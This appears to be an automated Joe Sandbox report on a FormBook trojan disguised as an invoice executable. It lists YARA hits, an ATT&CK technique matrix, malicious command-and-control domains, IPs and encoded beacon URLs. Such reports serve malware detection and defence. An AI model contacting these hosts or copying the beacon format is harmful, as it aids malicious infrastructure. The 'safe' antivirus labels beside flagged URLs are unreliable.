Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_VISTA
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_7
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_012C1204
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_012C1806
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0036041E CreateBindCtx,SysAllocStringByteLen,SysFreeString,	4_2_0036041E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00361AA2 CreateBindCtx,MkParseDisplayName,	4_2_00361AA2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_003566C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,	4_2_003566C1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	225 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	612 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.crucka.xyzReferer:	0%	Avira URL Cloud	safe
http://www.alivioquantico.comReferer:	0%	Avira URL Cloud	safe
www.crucka.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.ilovetvs.com	0%	Avira URL Cloud	safe
http://www.mantapnagita777.com/jd21/	0%	Avira URL Cloud	safe
http://www.uhug.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.00050591.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.freyja.info	0%	Avira URL Cloud	safe
http://www.thepowerofzeus.com	0%	Avira URL Cloud	safe
http://www.alivioquantico.com/jd21/www.00050591.xyz	0%	Avira URL Cloud	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://www.gbqspj.club/jd21/	0%	Avira URL Cloud	safe
http://www.freyja.info/jd21/	0%	Avira URL Cloud	safe
http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz	0%	Avira URL Cloud	safe
http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz	0%	Avira URL Cloud	safe
http://www.amsya.comReferer:	0%	Avira URL Cloud	safe
http://www.arthemis-168bet.site/jd21/www.ilovetvs.com	0%	Avira URL Cloud	safe
http://www.thepowerofzeus.comReferer:	0%	Avira URL Cloud	safe
http://www.tyumk.xyzReferer:	0%	Avira URL Cloud	safe
http://www.thepowerofzeus.com/jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ	0%	Avira URL Cloud	safe
http://www.bougeefilth.com	0%	Avira URL Cloud	safe
http://www.gbqspj.clubReferer:	0%	Avira URL Cloud	safe
http://www.mantapnagita777.comReferer:	0%	Avira URL Cloud	safe
http://www.00050591.xyzReferer:	0%	Avira URL Cloud	safe
http://www.thepowerofzeus.com/jd21/www.alivioquantico.com	0%	Avira URL Cloud	safe
http://www.kjsdhklssk73.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.bougeefilth.com/jd21/	0%	Avira URL Cloud	safe
http://www.kapten69pola.xyz	0%	Avira URL Cloud	safe
http://www.batremake.com/jd21/www.gbqspj.club	0%	Avira URL Cloud	safe
http://www.amsya.com	0%	Avira URL Cloud	safe
http://www.tyumk.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3	0%	Avira URL Cloud	safe
http://www.tyumk.xyz/jd21/www.amsya.com	0%	Avira URL Cloud	safe
http://www.00050591.xyz/jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ	0%	Avira URL Cloud	safe
http://www.bougeefilth.com/jd21/www.uhug.xyz	0%	Avira URL Cloud	safe
http://www.arthemis-168bet.site/jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ	0%	Avira URL Cloud	safe
http://www.batremake.com	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleanerxe	0%	Avira URL Cloud	safe
http://www.ilovetvs.com/jd21/	0%	Avira URL Cloud	safe
http://www.alivioquantico.com/jd21/	0%	Avira URL Cloud	safe
http://www.uhug.xyz/jd21/www.crucka.xyz	0%	Avira URL Cloud	safe
http://www.freyja.infoReferer:	0%	Avira URL Cloud	safe
http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site	0%	Avira URL Cloud	safe
http://www.uhug.xyzReferer:	0%	Avira URL Cloud	safe
http://www.arthemis-168bet.siteReferer:	0%	Avira URL Cloud	safe
http://www.ilovetvs.comReferer:	0%	Avira URL Cloud	safe
http://www.batremake.com/jd21/	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	0%	Avira URL Cloud	safe
http://www.ilovetvs.com/jd21/www.bougeefilth.com	0%	Avira URL Cloud	safe
http://www.crucka.xyz	0%	Avira URL Cloud	safe
http://java.sun.com	0%	Avira URL Cloud	safe
http://www.freyja.info/jd21/www.batremake.com	0%	Avira URL Cloud	safe
http://www.uhug.xyz	0%	Avira URL Cloud	safe
http://www.crucka.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.arthemis-168bet.site/jd21/	0%	Avira URL Cloud	safe
http://www.arthemis-168bet.site	0%	Avira URL Cloud	safe
http://www.gbqspj.club	0%	Avira URL Cloud	safe
http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X	0%	Avira URL Cloud	safe
http://www.kapten69pola.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleaner	0%	Avira URL Cloud	safe
http://www.ilovetvs.com/jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ	0%	Avira URL Cloud	safe
http://www.crucka.xyz/jd21/www.freyja.info	0%	Avira URL Cloud	safe
http://www.thepowerofzeus.com/jd21/	0%	Avira URL Cloud	safe
http://www.batremake.comReferer:	0%	Avira URL Cloud	safe
http://www.kapten69pola.xyzReferer:	0%	Avira URL Cloud	safe
http://www.alivioquantico.com	0%	Avira URL Cloud	safe
http://www.gbqspj.club/jd21/www.mantapnagita777.com	0%	Avira URL Cloud	safe
http://www.kjsdhklssk73.xyzReferer:	0%	Avira URL Cloud	safe
http://www.kapten69pola.xyz/jd21/www.tyumk.xyz	0%	Avira URL Cloud	safe
http://www.00050591.xyz	0%	Avira URL Cloud	safe
http://www.amsya.com/jd21/	0%	Avira URL Cloud	safe
http://www.kjsdhklssk73.xyz	0%	Avira URL Cloud	safe
http://www.tyumk.xyz	0%	Avira URL Cloud	safe
http://www.mantapnagita777.com	0%	Avira URL Cloud	safe
http://www.bougeefilth.comReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
alivioquantico.com	192.185.209.182	true	true	unknown
www.batremake.com	213.186.33.5	true	false	unknown
ilovetvs.com	162.241.203.16	true	true	unknown
www.mantapnagita777.com	104.21.91.94	true	false	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	unknown
www.thepowerofzeus.com	185.107.56.60	true	true	unknown
arthemis-168bet.site	84.32.84.32	true	true	unknown
00050591.xyz	65.21.196.90	true	true	unknown
www.freyja.info	76.223.54.146	true	false	unknown
www.00050591.xyz	unknown	unknown	true	unknown
www.uhug.xyz	unknown	unknown	true	unknown
www.gbqspj.club	unknown	unknown	true	unknown
www.arthemis-168bet.site	unknown	unknown	true	unknown
www.bougeefilth.com	unknown	unknown	true	unknown
www.kjsdhklssk73.xyz	unknown	unknown	true	unknown
www.alivioquantico.com	unknown	unknown	true	unknown
www.crucka.xyz	unknown	unknown	true	unknown
www.ilovetvs.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.crucka.xyz/jd21/	true	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.com/jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.00050591.xyz/jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.site/jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.ilovetvs.com/jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.crucka.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uhug.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alivioquantico.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.00050591.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.freyja.info	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alivioquantico.com/jd21/www.00050591.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ilovetvs.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mantapnagita777.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gbqspj.club/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.freyja.info/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.site/jd21/www.ilovetvs.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bougeefilth.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.amsya.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gbqspj.clubReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mantapnagita777.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bougeefilth.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.com/jd21/www.alivioquantico.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapten69pola.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.00050591.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.amsya.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3	explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batremake.com/jd21/www.gbqspj.club	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kjsdhklssk73.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyz/jd21/www.amsya.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bougeefilth.com/jd21/www.uhug.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batremake.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ilovetvs.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerxe	explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uhug.xyz/jd21/www.crucka.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alivioquantico.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.freyja.infoReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batremake.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.freyja.info/jd21/www.batremake.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X	explorer.exe, 00000003.00000002.869745021.0000000008CFF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.0000000002D9F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.siteReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ilovetvs.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uhug.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uhug.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://java.sun.com	explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.site/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ilovetvs.com/jd21/www.bougeefilth.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.site	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gbqspj.club	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapten69pola.xyz/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batremake.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kjsdhklssk73.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alivioquantico.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyz/jd21/www.freyja.info	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gbqspj.club/jd21/www.mantapnagita777.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapten69pola.xyzReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.amsya.com/jd21/	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.00050591.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kapten69pola.xyz/jd21/www.tyumk.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kjsdhklssk73.xyz	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bougeefilth.comReferer:	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mantapnagita777.com	explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.185.209.182	alivioquantico.com	United States	46606	UNIFIEDLAYER-AS-1US	true
65.21.196.90	00050591.xyz	United States	199592	CP-ASDE	true
185.107.56.60	www.thepowerofzeus.com	Netherlands	43350	NFORCENL	true
162.241.203.16	ilovetvs.com	United States	26337	OIS1US	true
84.32.84.32	arthemis-168bet.site	Lithuania	33922	NTT-LT-ASLT	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482411
Start date and time:	2024-07-25 21:34:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@13/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 64 Number of non-executed functions: 288
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
